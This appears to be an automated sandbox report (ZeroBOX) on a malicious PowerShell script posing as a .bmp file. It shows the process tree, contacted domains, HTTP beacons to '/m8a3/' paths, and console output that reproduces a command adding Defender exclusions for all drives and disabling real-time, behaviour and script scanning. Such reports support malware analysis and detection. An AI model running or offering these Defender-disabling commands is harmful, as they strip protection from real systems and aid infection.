Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 25, 2023, 9:05 a.m.	July 25, 2023, 9:07 a.m.

Size	724.6KB
Type	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
MD5	`b503ffd3552cd5a97874afe409f3b469`
SHA256	`914631ce7609070f94c97ec1e811d8c9b930c0e69636169d2498ac7103d3fefd`
CRC32	`331F40BE`
ssdeep	`12288:apgPEpE3i1xykBz7sRMJtyTTRzxuZFowBUUc1nA+:apgx3HEz7sRIty33uk7Uc1A+`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\Untitled2.bmp.ps1
3044
- ServiceHub.exe "C:\Users\test22\AppData\Roaming\ServiceHub.exe"
  2268
  - ServiceHub.exe "C:\Users\test22\AppData\Roaming\ServiceHub.exe"
    2524

Name	Response	Post-Analysis Lookup
www.blackhawkstickets.com	A 91.195.240.68	91.195.240.68
www.914762.com	A 46.149.197.98 CNAME d007koo.yb550.com A 46.149.197.101	46.149.197.101
www.jshjyz.com	A 104.164.75.231	104.164.75.231
www.sqlite.org	A 45.33.6.223	45.33.6.223
www.eunicebarber.com	A 134.73.114.39	134.73.114.39
www.aurestia.com	A 178.211.137.32	178.211.137.32
www.moqainc.com	A 156.237.252.50	156.237.252.50
www.u1uc86.shop	A 8.217.57.91	8.217.57.91

IP Address	Status	Action
104.164.75.231	Active	Moloch
134.73.114.39	Active	Moloch
156.237.252.50	Active	Moloch
164.124.101.2	Active	Moloch
178.211.137.32	Active	Moloch
45.33.6.223	Active	Moloch
46.149.197.101	Active	Moloch
8.217.57.91	Active	Moloch
91.195.240.68	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW July 25, 2023, 9:05 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 25, 2023, 9:05 a.m.			0	0
IsDebuggerPresent July 25, 2023, 9:05 a.m.			0	0

Command line console output was observed (50 out of 1585 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: At line:2 char:58 console_handle: 0x00000047	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: + 67..90\|foreach-object{ $drive = [char]$_;Add-MpPreference <<<< -ExclusionPat console_handle: 0x00000053	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: h "$($drive):\" -ErrorAction SilentlyContinue;Add-MpPreference -ExclusionProces console_handle: 0x0000005f	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: s "$($drive):\*" -ErrorAction SilentlyContinue;};Set-MpPreference -DisableArchi console_handle: 0x0000006b	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: veScanning 1 -ErrorAction SilentlyContinue;Set-MpPreference -DisableBehaviorMon console_handle: 0x00000077	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: itoring 1 -ErrorAction SilentlyContinue;Set-MpPreference -DisableIntrusionPreve console_handle: 0x00000083	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: ntionSystem 1 -ErrorAction SilentlyContinue;Set-MpPreference -DisableIOAVProtec console_handle: 0x0000008f	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: tion 1 -ErrorAction SilentlyContinue;Set-MpPreference -DisableRemovableDriveSca console_handle: 0x0000009b	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: nning 1 -ErrorAction SilentlyContinue;Set-MpPreference -DisableScanningMappedNe console_handle: 0x000000a7	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: tworkDrivesForFullScan 1 -ErrorAction SilentlyContinue;Set-MpPreference -Disabl console_handle: 0x000000b3	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: eScanningNetworkFiles 1 -ErrorAction SilentlyContinue;Set-MpPreference -Disable console_handle: 0x000000bf	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: ScriptScanning 1 -ErrorAction SilentlyContinue;Set-MpPreference -DisableRealtim console_handle: 0x000000cb	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: eMonitoring 1 -ErrorAction SilentlyContinue;Set-MpPreference -LowThreatDefaultA console_handle: 0x000000d7	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: ction Allow -ErrorAction SilentlyContinue;Set-MpPreference -ModerateThreatDefau console_handle: 0x000000e3	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: ltAction Allow -ErrorAction SilentlyContinue;Set-MpPreference -HighThreatDefaul console_handle: 0x000000ef	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: tAction Allow -ErrorAction SilentlyContinue;Set-MpPreference -SubmitSamplesCons console_handle: 0x000000fb	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: ent 2 -ErrorAction SilentlyContinue;Set-MpPreference -DisableRealtimeMonitoring console_handle: 0x00000107	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: $true -ErrorAction SilentlyContinue;Set-MpPreference -MAPSReporting 0 -ErrorAc console_handle: 0x00000113	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: tion SilentlyContinue console_handle: 0x0000011f	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000012b	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: mmandNotFoundException console_handle: 0x00000137	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000143	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000163	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000016f	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000017b	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: At line:2 char:134 console_handle: 0x00000187	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: + 67..90\|foreach-object{ $drive = [char]$_;Add-MpPreference -ExclusionPath "$($ console_handle: 0x00000193	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: drive):\" -ErrorAction SilentlyContinue;Add-MpPreference <<<< -ExclusionProces console_handle: 0x0000019f	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: s "$($drive):\*" -ErrorAction SilentlyContinue;};Set-MpPreference -DisableArchi console_handle: 0x000001ab	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: veScanning 1 -ErrorAction SilentlyContinue;Set-MpPreference -DisableBehaviorMon console_handle: 0x000001b7	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: itoring 1 -ErrorAction SilentlyContinue;Set-MpPreference -DisableIntrusionPreve console_handle: 0x000001c3	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: ntionSystem 1 -ErrorAction SilentlyContinue;Set-MpPreference -DisableIOAVProtec console_handle: 0x000001cf	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: tion 1 -ErrorAction SilentlyContinue;Set-MpPreference -DisableRemovableDriveSca console_handle: 0x000001db	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: nning 1 -ErrorAction SilentlyContinue;Set-MpPreference -DisableScanningMappedNe console_handle: 0x000001e7	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: tworkDrivesForFullScan 1 -ErrorAction SilentlyContinue;Set-MpPreference -Disabl console_handle: 0x000001f3	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: eScanningNetworkFiles 1 -ErrorAction SilentlyContinue;Set-MpPreference -Disable console_handle: 0x000001ff	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: ScriptScanning 1 -ErrorAction SilentlyContinue;Set-MpPreference -DisableRealtim console_handle: 0x0000020b	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: eMonitoring 1 -ErrorAction SilentlyContinue;Set-MpPreference -LowThreatDefaultA console_handle: 0x00000217	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: ction Allow -ErrorAction SilentlyContinue;Set-MpPreference -ModerateThreatDefau console_handle: 0x00000223	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: ltAction Allow -ErrorAction SilentlyContinue;Set-MpPreference -HighThreatDefaul console_handle: 0x0000022f	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: tAction Allow -ErrorAction SilentlyContinue;Set-MpPreference -SubmitSamplesCons console_handle: 0x0000023b	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: ent 2 -ErrorAction SilentlyContinue;Set-MpPreference -DisableRealtimeMonitoring console_handle: 0x00000247	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: $true -ErrorAction SilentlyContinue;Set-MpPreference -MAPSReporting 0 -ErrorAc console_handle: 0x00000253	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: tion SilentlyContinue console_handle: 0x0000025f	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000026b	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: mmandNotFoundException console_handle: 0x00000277	1	1
WriteConsoleW July 25, 2023, 9:05 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000283	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey July 25, 2023, 9:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050810e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 9:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050810e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 9:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050810e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 9:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050810e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 9:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050810e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 9:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050810e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 25, 2023, 9:05 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (16 events)

request	POST http://www.blackhawkstickets.com/m8a3/
request	GET http://www.blackhawkstickets.com/m8a3/?3fV=wELRwQq9Ik4akR1AOQPiTuGKLBWDjs8a2YaLQcHnUlU7Bv3tKYzAPKjFnfPfLGcW0Jon1I5GThlPJSE9uANXd1MOTjhszMbeqP80jx4=&tzhR=VoZB5
request	GET http://www.sqlite.org/2016/sqlite-dll-win32-x86-3120000.zip
request	GET http://www.sqlite.org/2017/sqlite-dll-win32-x86-3160000.zip
request	POST http://www.moqainc.com/m8a3/
request	GET http://www.moqainc.com/m8a3/?3fV=2PXzv/KUOl1j1NuZtmCfgjmk8F4d7zpI1k9NLrqIqxTSD5EEUqAnKuNnQ3j68zwJ4/UMJIA84T5y5YZmbeegBpPNaATffbV8yLAKduU=&tzhR=VoZB5
request	POST http://www.u1uc86.shop/m8a3/
request	GET http://www.u1uc86.shop/m8a3/?3fV=5h8HxZ/VEhiexXVbMQOSyi/3Mq8FOldADmOfAXPisI7PhPT+BDz7e5vjA2S4Strjp4YKKaICYEzvWipuZUJ1fClpkGPLHU02z9EmeuA=&tzhR=VoZB5
request	POST http://www.eunicebarber.com/m8a3/
request	GET http://www.eunicebarber.com/m8a3/?3fV=KfxyrYt0+dAkLzUy5BAmpABz5VvFOs89DNVvjaW49ahTyKh9A9lKw+SabxvlU3Szqi/M1EC4o9KRioA0xZp4mHTtqaUR/OlFIGLcRDE=&tzhR=VoZB5
request	POST http://www.jshjyz.com/m8a3/
request	GET http://www.jshjyz.com/m8a3/?3fV=HdAArDrpc0/lWistcOXV8fE+D+9k1/Pmn5Nebv2sEOwmLRgBysRR+rlQ+FZERh068j6RXDw4R3I17DF8bzv3o/zP6s/z0ghnBgwDlLg=&tzhR=VoZB5
request	POST http://www.914762.com/m8a3/
request	GET http://www.914762.com/m8a3/?3fV=fmtS1HqN0Y1GeG2n+s22nkteR5zb5rH2owPMNZ2Uw45FRfDCx3Qi2vCzK5U3OLBwaoIRNyVRLkfIuDiLo+1mYA8v0QdlhtIT4EYDvzg=&tzhR=VoZB5
request	POST http://www.aurestia.com/m8a3/
request	GET http://www.aurestia.com/m8a3/?3fV=MQDzZIc0FUKkDnXQ5rfeT8IT1Q2H7vA9uok2G/WP3wmzi3A9vAewWHa8AW9vIGV9U9KwcU6guObd6YworSgfcdiVdqsBbQc4sRTN8us=&tzhR=VoZB5

Sends data using the HTTP POST Method (7 events)

request	POST http://www.blackhawkstickets.com/m8a3/
request	POST http://www.moqainc.com/m8a3/
request	POST http://www.u1uc86.shop/m8a3/
request	POST http://www.eunicebarber.com/m8a3/
request	POST http://www.jshjyz.com/m8a3/
request	POST http://www.914762.com/m8a3/
request	POST http://www.aurestia.com/m8a3/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 84 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0220f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02881000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02890000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07440000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x074c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x074c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x074c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x074c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02882000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02883000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02884000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02885000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05571000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05586000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05587000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05588000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02886000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02209000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02887000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021dd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02888000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a10000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d91000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d92000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00392000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0039a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 25, 2023, 9:05 a.m.	process_identifier: 2268 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
